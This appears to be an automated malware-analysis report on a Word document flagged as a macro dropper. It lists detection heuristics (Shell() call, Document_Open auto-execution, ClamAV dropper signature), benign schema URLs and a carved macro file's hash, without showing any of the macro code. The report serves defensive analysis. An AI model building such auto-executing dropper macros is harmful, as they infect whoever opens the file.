Malware Insights
The critical OLE_VBA_SHELL heuristic indicates that the VBA macro in this document attempts to execute commands through the Shell() function. This is reinforced by the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic, which flags an auto-execution routine (Document_Open) combined with execution tokens. The ClamAV detection 'Doc.Dropper.Agent-6387323-0' strongly suggests dropper functionality, where the macro likely downloads and executes a secondary payload. The document body content is obfuscated and provides no direct clues to the specific lure.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6387323-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6387323-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://www.iec.ch (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37738 bytes |

SHA-256 (macros.bas): 108f280d9bbbb3fb49325c3dfbcc809a442fd5f43b8fb53ecf6dd020aeb90784
Preview script: first 1,000 lines of the extracted script (obfuscated VBA source)